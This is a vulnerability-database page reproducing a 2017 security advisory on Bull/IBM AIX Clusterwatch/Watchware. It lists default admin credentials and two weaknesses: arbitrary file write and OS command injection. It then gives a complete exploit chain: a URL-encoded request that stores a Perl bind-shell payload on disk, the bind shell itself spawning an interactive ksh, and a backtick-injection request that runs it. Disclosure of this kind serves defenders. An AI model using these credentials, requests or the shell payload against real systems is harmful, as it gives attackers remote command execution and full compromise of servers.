Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bull / IBM AIX Clusterwatch / Watchware File Write / Command Injection

🗓️ 07 Mar 2017 00:00:00Reported by RandoriSecType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Bull AIX Clusterwatch vulnerabilities: Trivial creds, file write, command injectio

Code
`Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.  
  
Marble effect in the web banner and questionable font: it smells the 90s !  
  
Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:  
  
Trivial admin credentials  
Authenticated user can write on the system file  
Authenticated user can inject OS commands  
By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.  
  
We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesnat matter, letas do some archeology alone.  
  
Here are the details:  
  
  
1. Trivial creds: smwadmin/bullsmw  
  
2. Authenticated user can write on the system file  
  
A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).  
  
But these filters are written on disk and you can call them using the following OS command injection.  
  
Request to write the shellcode:  
  
http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A  
  
The shellcode we used:  
  
perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'  
  
3. Authenticated user can inject OS commands  
  
When listing the processes you can apply a filtera| and inject a single command using backticks, great !  
  
Very useful to execute our shellcode which was stored in a single file (the filter).  
  
Request to execute the shellcode:  
  
http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2017 00:00Current
bullaixclusterwatchvulnerabilitiesadmin credentialsfile writecommand injectionsysadminsweb appos commands
41